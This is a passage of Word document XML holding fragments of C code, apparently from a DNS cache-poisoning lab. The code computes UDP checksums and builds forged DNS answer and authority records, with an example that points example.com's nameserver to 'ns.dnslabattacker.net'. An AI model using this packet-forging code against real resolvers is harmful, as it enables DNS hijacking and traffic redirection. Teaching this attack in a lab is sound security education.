    <w:p w14:paraId="7C87EB8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calculate udp checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05632D8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uint16_t check_udp_sum(uint8_t *buffer, int len)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6503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60CFFBF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long sum = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2602E09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struct ipheader *tempI=(struct ipheader *)(buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576FE0B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struct udpheader *tempH=(struct udpheader *)(buffer+sizeof(struct ipheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0CCC1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struct dnsheader *tempD=(struct dnsheader *)(buffer+sizeof(struct ipheader)+sizeof(struct udpheader));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FE284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tempH-&gt;udph_chksum=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5C264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sum=checksum( (uint16_t *)   &amp;(tempI-&gt;iph_sourceip) ,8 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0636312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sum+=checksum((uint16_t *) tempH,len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6807EB65" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DE802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sum+=ntohs(IPPROTO_UDP+len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE7E2D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sum=(sum&gt;&gt;16)+(sum &amp; 0x0000ffff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6173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sum+=(sum&gt;&gt;16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E4789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return (uint16_t)(~sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1E3E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06C132F2" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CCC247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Function for checksum calculation. From the RFC,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FA5B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the checksum algorithm is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA48DE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"The checksum field is the 16 bit one's complement of the one's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4DB0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complement sum of all 16 bit words in the header.  For purposes of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B30B3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computing the checksum, the value of the checksum field is zero."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C1D98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unsigned short csum(unsigned short *buf, int nwords)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC2F1C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1DC1273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long sum;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160977D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for(sum=0; nwords&gt;0; nwords--)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447424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sum += *buf++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC783F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sum = (sum &gt;&gt; 16) + (sum &amp;0xffff);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1DE46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sum += (sum &gt;&gt; 16);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED04F8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return (unsigned short)(~sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688807D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45A2CC54" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118595F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Example of Answer Record Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD6402D" w14:textId="63A93996" w:rsidR="002C29DB" w:rsidRPr="00CD7FE2" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*************************************************************************</w:t>
      </w:r>
      <w:r w:rsidR="00FD7EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>********************</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268E154" w14:textId="403501BA" w:rsidR="002C29DB" w:rsidRPr="00CD7FE2" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Name                </w:t>
      </w:r>
      <w:r w:rsidR="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Record Type     class        </w:t>
      </w:r>
      <w:r w:rsidR="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Time To Live        </w:t>
      </w:r>
      <w:r w:rsidR="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data Length      Data: IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C992B56" w14:textId="4CC08605" w:rsidR="002C29DB" w:rsidRPr="00CD7FE2" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  twysw.example.com     "A" record      </w:t>
      </w:r>
      <w:r w:rsidR="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internet     0x00002000(</w:t>
      </w:r>
      <w:r w:rsidR="00FB3306" w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">seconds)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">0x0004           </w:t>
      </w:r>
      <w:r w:rsidR="00FD7EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1.2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B203139" w14:textId="10E24A82" w:rsidR="002C29DB" w:rsidRPr="00CD7FE2" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                       </w:t>
      </w:r>
      <w:r w:rsidR="00FD7EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x0001          </w:t>
      </w:r>
      <w:r w:rsidR="00FB3306">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x0001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D2D46" w14:textId="5B70364F" w:rsidR="002C29DB" w:rsidRPr="00CD7FE2" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7FE2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>***************************************************************************</w:t>
      </w:r>
      <w:r w:rsidR="00FD7EB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>******************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EC0E7" w14:textId="13E85175"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unsigned short set_A_</w:t>
      </w:r>
      <w:r w:rsidR="0029347E" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>record (</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>char *buffer, char* name, char offset, char* ip_addr) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B3C0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char *p = buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208AB7C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if (name == NULL) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B921F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4D58BDF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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607BD61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strcpy(p, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D1F14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strlen(name)+1;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5621E2F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6D0E1EEF" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C5AFE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*)p) = htons(0x0001);  // Record type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FA458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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474920C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5B7A837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*)p) = htons(0x0001);  // Class type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0612A05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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139EB66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4AC7494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int *)p) = htonl(0x00002000);  // TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A522E4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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC6810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6350F9E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*)p) = htons(0x0004);  // Data Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3490FA2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2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D86F39" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="622FB02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((struct in_addr *)p)-&gt;s_addr = inet_addr(ip_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A84B45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4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3007129F" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A622D4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return p- buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F327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1BEFD1E1" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5365A0" w14:textId="77777777" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6E9081" w14:textId="7897BD63"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This is the structure which holds the authoritative </w:t>
      </w:r>
      <w:r w:rsidR="00BC5157" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Name Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA757C" w14:textId="50E49519"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r w:rsidR="00BC5157" w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Authoritative Name Server Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6A00F8" w14:textId="53FF6BD9"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r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B40BA6" w14:textId="6A82ABF0" w:rsidR="002C29DB" w:rsidRPr="005F78C4" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Name         </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve">Record Type     </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve">Class        </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve">Time To Live          </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">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Data Length         Data : Name Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2FCC2D" w14:textId="320B08FB" w:rsidR="002C29DB" w:rsidRPr="005F78C4" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> example.com  </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve"> "NS" Record     </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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Internet     0x000020000</w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">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w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F15FA" w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">seconds)  </w:t>
      </w:r>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">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 xml:space="preserve">0x0017             </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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ns.dnslabattacker.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8B143" w14:textId="6C644326" w:rsidR="002C29DB" w:rsidRPr="005F78C4" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve">  0x0001         </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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 xml:space="preserve">0x0001                                                   </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61754C27" w14:textId="280DA51D" w:rsidR="002C29DB" w:rsidRPr="005F78C4" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                        </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                       </w:t>
      </w:r>
      <w:r w:rsidR="000F15FA">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w:t>
      </w:r>
      <w:r w:rsidR="00145A23">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(Pkt-Representation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF754E6" w14:textId="560788C7" w:rsidR="002C29DB" w:rsidRPr="005F78C4" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                           </w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                       </w:t>
      </w:r>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2|n|s|14|d|n|s|l|a|b|a|t|t|a|c|k|e|r|3|n|e|t   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A80E881" w14:textId="70F09143" w:rsidR="002C29DB" w:rsidRPr="002C29DB" w:rsidRDefault="002C29DB" w:rsidP="002C29DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="002C29DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>********************************************************</w:t>
      </w:r>
      <w:r w:rsidR="005F78C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>********************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E64548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unsigned short set_NS_record(char *buffer, char* name, char offset, char* ip_addr) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BE40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char *p = buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538060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if (name == NULL) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D50A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0E1C036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else {</w:t>
      </w:r>
    </w:p>
